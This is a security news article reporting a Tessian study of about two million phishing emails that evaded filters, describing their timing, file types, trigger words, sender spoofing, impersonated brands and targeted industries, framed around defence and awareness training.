One hundred dollar bill on fish hook showing phishing attacks and malicious emails

Phishing Attacks More Sophisticated, Malicious Emails Timed To Coincide With Periods of Low Energy and Inattentiveness

The fact that phishing attacks have been on the rise is no secret, but a new study from enterprise security firm Tessian highlights some of the ways in which they are becoming more sophisticated. One of the most interesting items is that malicious emails are now being timed to coincide with the “mid-afternoon slump” common to office workers; cyber criminals are avoiding the 9:00 AM – 1:00 PM period in which studies show employees are most alert, instead delivering messages in the 2:00 PM – 6:00 PM window when energy is waning and suspicious messages may face less scrutiny.

Phishing attacks evolve as detection of malicious emails improves

Tessian drew on about two million malicious emails its systems flagged (but that made it past the automated defenses of clients) between July 2020 and July 2021. The study points out that automated defense systems can do little against well-constructed types of phishing attacks that have not been seen before, which most of these emails were.

Though some amount of malicious emails are expected to be able to evade the commonly-used SEG tools that serve as first line of defense, the amount seen in this study indicate that more sophisticated phishing attacks are landing in inboxes than was generally anticipated.

Spearphising attacks now not only research their target to add details that will inspire confidence and slip past filters, but also keep up with their movements (often posted on sites like LinkedIn or personal social media) and time the attack to coincide with when a key decision-maker is out of the office.

The majority of malicious emails also no longer contain attachments, instead trying to trick or manipulate the recipient into clicking on a link to an attack site. However, those that are still using attachments strongly prefer the PDF file. Not only are these very commonly sent around in organizations, they can be set up to automatically run a JavaScript file or direct the recipient’s browser to an attack site when opened. The next two most common are fake image files with .PNG and .JPG extensions. All other types of files are relatively rare compared to these three extensions.

It’s all about timing when it comes to success rate

Phishing attacks are also now widely adopting one of the key elements of the business email compromise attack: pressure and urgency on the target. Tessian surveyed employees of clients who had clicked on a malicious email: 45% said they did it because they were distracted, 52% said that they are prone to make more mistakes when under stress, and 29% said they weren’t paying attention when they clicked on the email.

Automated defenses can greatly cut down on the amount of phishing attacks that slip through, but ultimately the key factor is employee attention and security awareness training to notice things that are out of the ordinary and avoid clicking on malicious links and extensions. Tessian finds that most malicious emails are now sent between 2 PM to 6 PM, when employees can be expected to be at their least vigilant: tired after a long day of work, digesting a big lunch, one foot already out the door mentally, and so on.

Phishers also seem to keep office hours too, though they turn out in force on retail holidays. Malicious emails really ramp up in October, as the holiday shopping season begins. Phishing attacks hit their absolute peak on Black Friday. They then fall precipitously as Christmas approaches, all but disappearing on New Years Day. They also lull a bit in the summer months before jumping back up in September.

Use of pressure and stress as psychological tactic in phishing attacks

The words most commonly used in phishing attacks also point to the common adoption of pressure and stress as a psychological tactic. “New,” “update” and “security” are among the words that most frequently appear in subject lines of malicious emails. “Immediately,” “now” and “payment” are favorites to use in the body copy.

Scammers are also commonly making use of Covid-19 as an element of phishing attacks, and also like to use fake “unsubscribe” links.

Generic email accounts still used in most phishing attacks

Most phishing attacks (60%) are still coming from generic email accounts, easily made with services such as GMail. Most of these will at least enter a display name that appears to be legitimate and connected to the company in some way, however. And the remaining 40% are using a variety of more advanced techniques. 13% are spoofing legitimate return addresses by altering email headers, and 11.25% come from a custom domain set up by the attackers meant to look like a legitimate company.

Those among the more advanced impersonators have some favorites that they tend to go to. Attackers most frequently impersonate Microsoft, ADP Security, Amazon, Adobe Sign, and Zoom.

Retail industry most frequently targeted

Phishing attacks are more frequent with specific industries as well. Retail is attacked far more than any other industry. Manufacturing and food & beverage are attacked 3x more often than most other industries. Other frequent targets include research & development, tech, real estate, legal & professional services and financial services. Legal & professional services are compromised more often than any other industry, followed by financial services and tech.

The targets of phishing attacks also vary with the intent of the attacker. Other studies have shown that ransomware attackers have an increasing preference for large organizations with the ability to pay up. But phishing campaigns looking to impersonate executives and initiate transfers of funds don’t care so much about company size, according to Tessian.